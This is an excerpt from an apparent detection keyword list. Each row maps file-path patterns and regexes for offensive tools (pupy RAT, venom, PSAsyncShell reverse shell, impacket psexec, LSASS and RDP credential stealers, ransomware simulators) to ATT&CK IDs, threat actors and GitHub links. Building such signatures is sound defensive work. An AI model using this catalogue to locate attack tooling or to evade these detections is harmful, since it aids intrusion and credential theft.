"*\ps2exe.ps1*",".{0,1000}\\ps2exe\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","17595"
"*\PS2EXE\*.ps1*",".{0,1000}\\PS2EXE\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","17596"
"*\PSAsyncShell.ps1*",".{0,1000}\\PSAsyncShell\.ps1.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","17597"
"*\PSAsyncShell.sh*",".{0,1000}\\PSAsyncShell\.sh.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","17598"
"*\PSAsyncShell-main*",".{0,1000}\\PSAsyncShell\-main.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","17599"
"*\PSAttack.sln*",".{0,1000}\\PSAttack\.sln.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","17600"
"*\PSAttack.zip*",".{0,1000}\\PSAttack\.zip.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","17601"
"*\psexec.py*",".{0,1000}\\psexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","17603"
"*\PsExecLog.log*",".{0,1000}\\PsExecLog\.log.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","17604"
"*\psexecsvc.py*",".{0,1000}\\psexecsvc\.py.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","N/A","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","17605"
"*\PSexecutionPolicy.bat*",".{0,1000}\\PSexecutionPolicy\.bat.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17606"
"*\psgetsys.ps1*",".{0,1000}\\psgetsys\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17607"
"*\psgetsys.ps1*",".{0,1000}\\psgetsys\.ps1.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","17608"
"*\psgetsys.ps1*",".{0,1000}\\psgetsys\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17609"
"*\PSInject.ps1*",".{0,1000}\\PSInject\.ps1.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17610"
"*\PSLessExec.exe*",".{0,1000}\\PSLessExec\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","17611"
"*\PSnmap.ps1*",".{0,1000}\\PSnmap\.ps1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","17614"
"*\PSnmap.psd1*",".{0,1000}\\PSnmap\.psd1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","17615"
"*\PSnmap.psm1*",".{0,1000}\\PSnmap\.psm1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","17616"
"*\PSObfucate.py*",".{0,1000}\\PSObfucate\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","17617"
"*\pspasswd.exe*",".{0,1000}\\pspasswd\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","17618"
"*\pspasswd64.exe*",".{0,1000}\\pspasswd64\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","17619"
"*\PSprofile.exe*",".{0,1000}\\PSprofile\.exe.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","17620"
"*\PSPY.dll*",".{0,1000}\\PSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","17621"
"*\PSPY.exe*",".{0,1000}\\PSPY\.exe.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","17622"
"*\pspy\pspy.go*",".{0,1000}\\pspy\\pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","17623"
"*\PSRansom -*",".{0,1000}\\PSRansom\s\-.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","17624"
"*\PSRansom.ps1*",".{0,1000}\\PSRansom\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","17625"
"*\PSRecon\*",".{0,1000}\\PSRecon\\.{0,1000}","offensive_tool_keyword","PSRecon","PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. or retained locally.","T1059 - T1003 - T1556 - T1204","TA0002 - TA0009","N/A","N/A","Discovery","https://github.com/gfoss/PSRecon","1","0","N/A","N/A","9","5","486","105","2017-07-29T15:03:04Z","2015-08-03T05:43:38Z","17626"
"*\PSReflect.psm1*",".{0,1000}\\PSReflect\.psm1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","17627"
"*\psscanner\psscanner.go*",".{0,1000}\\psscanner\\psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","17628"
"*\pth-toolkit-master\*",".{0,1000}\\pth\-toolkit\-master\\.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","17631"
"*\Public\chop.enc*",".{0,1000}\\Public\\chop\.enc.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","17632"
"*\Public\dcapi.dll*",".{0,1000}\\Public\\dcapi\.dll.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","17633"
"*\Public\Document\SessionHunter.txt*",".{0,1000}\\Public\\Document\\SessionHunter\.txt.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","0","N/A","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","17636"
"*\Public\Documents\Amnesiac*",".{0,1000}\\Public\\Documents\\Amnesiac.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","17637"
"*\Public\Documents\DSInternals*",".{0,1000}\\Public\\Documents\\DSInternals.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","17638"
"*\public\klogging.log*",".{0,1000}\\public\\klogging\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","17639"
"*\Public\Music\RDPCreds.txt*",".{0,1000}\\Public\\Music\\RDPCreds\.txt.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","17640"
"*\Public\panda.raw*",".{0,1000}\\Public\\panda\.raw.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","17641"
"*\Public\simpleMDWD.raw*",".{0,1000}\\Public\\simpleMDWD\.raw.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","17642"
"*\Public\sysMDWD.file*",".{0,1000}\\Public\\sysMDWD\.file.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","17643"
"*\pupwinutils\*",".{0,1000}\\pupwinutils\\.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17650"
"*\pupy\external\creddump7*",".{0,1000}\\pupy\\external\\creddump7.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17651"
"*\pupyx64.dll*",".{0,1000}\\pupyx64\.dll.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17652"
"*\pupyx64.exe*",".{0,1000}\\pupyx64\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17653"
"*\pupyx64d.exe*",".{0,1000}\\pupyx64d\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17654"
"*\pupyx86.dll*",".{0,1000}\\pupyx86\.dll.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17655"
"*\pupyx86.exe*",".{0,1000}\\pupyx86\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17656"
"*\pupyx86d.exe*",".{0,1000}\\pupyx86d\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17657"
